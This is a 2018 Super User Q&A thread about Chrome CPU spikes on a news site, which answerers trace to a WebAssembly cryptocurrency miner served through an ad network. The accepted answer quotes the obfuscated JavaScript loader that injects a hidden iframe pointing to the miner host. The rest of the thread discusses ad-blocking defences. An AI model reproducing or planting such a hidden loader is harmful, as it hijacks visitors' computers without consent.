Chrome uses 80% CPU when I visit a specific website

Question

Whenever I try to visit this particular website, chrome CPU usage shoots up to at least 75% and my laptop get way louder. If I close the tab everything goes back to normal.

Windows Task Manager CPU usage

Chrome Task Manager CPU Usage

RAM usage never goes up. My naive guess is the website is trying to mine cryptocurrency. But I this happens only if I use Chrome, Edge works normally when I visit this website. The website in question is www.123telugu.com. What could be the reason for this behavior?

Im using Chrome and my CPU usage doesnt change on the site. Im guessing the issue is local to your PC, not the site. — Keltari, Mar 10 '18 at 18:34
Yeah, that was my second guess. What could be the issue here? — Rohith Reddy, Mar 10 '18 at 18:36
Being a risky fellow, I visited that site with firefox. That specific tab kicked my CPU to 65% instantly, which is almost how quickly I closed the tab. — fred_dot_u, Mar 10 '18 at 18:50
What happens if I click those links? It borrows my computer for a bit, or now I have malware? — Mazura, Mar 11 '18 at 00:06
about the cryptocurrency miner...in a comment to [another SE posting](https://apple.stackexchange.com/questions/317786/how-to-stress-a-macbook-pro-retina) someone was making a similar claim regarding weather.com — , Mar 11 '18 at 02:47
You can test if its miner with https://github.com/stevespringett/disable-webassembly — Vadzim, Mar 11 '18 at 21:24
I went to that site and same happened so its probably a crypto miner — Suici Doga, Mar 12 '18 at 03:56
"Is it a cryptocurrency miner?" It's *always* a crypto miner. — Ian Kemp, Mar 12 '18 at 05:40

score 117 · Accepted Answer · answered Mar 10 '18 at 18:59

117

Yes, it’s a crypto currency miner. Hosted at www.datasecu.download, implemented in Web Assembly, communicating with its host via Websocket:

It’s distributed using a compromised advertising network:

Extract from https://s3.amazonaws.com/23ap.com/nodejs/sq9/sq_v2.js

var _0x7bc7=["iframe","setAttribute","https://www.datasecu.download/lot.html","head","appendChild","1IABALrINkcv2VFJWo7ctqH0f3Y6aTf1","start","createElement"];!function(t,x){!function(x){for(;--x;)t.push(t.shift())}(++x)}(_0x7bc7,367);var _0x5028=function(t,x){var a=_0x7bc7[t-=0];return console.log(a,t),a};a=document[_0x5028("0x0")](_0x5028("0x1")),a[_0x5028("0x2")]("src",_0x5028("0x3")),a.style.width="0px",a.style.height="1px",document[_0x5028("0x4")][_0x5028("0x5")](a);

tl;dr: Use an Adblocker already.

answered Mar 10 '18 at 18:59

Daniel B

60,360
9
122
163

3

Hmm. uBlock Origin doesn't stop it (on Firefox at least). – DavidPostill Mar 10 '18 at 20:31
5

[Virustotal](https://www.virustotal.com/#/url/6e62206bfca4ed0d0059aca4534cae00c2ce2c559a6317f14c5c536833a158e4/detection) comes back clean. Does no one classify crypto currency miners on websites as malicious? – Mar 11 '18 at 01:48
heh, that ad network might not even be "compromised", except intentionally. – Mar 11 '18 at 02:49
7

@Ploni there are some causes where their use isn't malicious and actually legitimate – Keith M Mar 11 '18 at 03:32
1

ABP doesn't appear to block it either. – Matthew FitzGerald-Chamberlain Mar 11 '18 at 03:44
In the meanwhile, try https://chrome.google.com/webstore/detail/no-coin-block-miners-on-t/gojamcfopckidlocpkbelmpjcgmbgjcl – Madara's Ghost Mar 11 '18 at 09:51
@DanielB: I need to set both "third-party scripts" and "third-party frames" to *neutral* for the adware/malware to work. I have them blocked by default. – David Foerster Mar 11 '18 at 10:05
@DavidFoerster Those are certainly sensible choices. However, this isn’t the default configuration, leaving many users vulnerable. That’s why it has to be in the default block lists. – Daniel B Mar 11 '18 at 12:02
4

I just added `www.datasecu.download` to my adblock filters and it blocks it now. Thanks. – Rohith Reddy Mar 11 '18 at 20:23
Semi-deobusficated version available at https://pastebin.com/6Ys3ihkJ (in a Pastebin because it was otherwise too long) – Solomon Ucko Mar 11 '18 at 21:15
5

@RonJohn I'd argue that cryptocurrency malware isn't that bad, at least compared to [getting Forbes'd](https://www.techdirt.com/articles/20160111/05574633295/forbes-site-after-begging-you-turn-off-adblocker-serves-up-steaming-pile-malware-ads.shtml). I'd rather have my CPU overused for a couple of minutes than malware installed on my computer. Not at all coincidentally, both are prevented by (a) having a strict adblocker and (b) refusing to make exceptions. – Nic Mar 12 '18 at 06:09
4

@Ploni Crypto miners are no more malicious than your printed newspaper ad. One taps processing power of your CPU, the other taps processing power of your brain, both do it for the financial gain of its operator. You can close both by closing the page, therefore: "not malicious." – Agent_L Mar 12 '18 at 09:03
1

**Do keep in mind that comments are not for extended discussion.** You might want to take the question of whether crypto mining in ads is malicious to [chat]. – Daniel B Mar 12 '18 at 09:11
2

@Agent_L that's debatable, what if someone knew how to access and use your brain without you knowing about it. At least you'd like to know what they are doing. In this case, no warning whatsoever was provided. – CPHPython Mar 12 '18 at 15:19

score 9 · Answer 2 · answered Mar 13 '18 at 10:06

9

For ublock you can load the noCoin filter list: https://github.com/hoshsadiq/adblock-nocoin-list/

This datasecu website is already included.

answered Mar 13 '18 at 10:06

jho

101
1

score 2 · Answer 3 · answered Oct 11 '18 at 16:57

2

Just disable javascript and the website won't be able to use your pc's cpu. If you use chrome. Right click -> inspect element -> network (tab) -> settings -> disable javascript.

answered Oct 11 '18 at 16:57

Sebastian Nielsen

316
3
16

Chrome uses 80% CPU when I visit a specific website

3 Answers3

Linked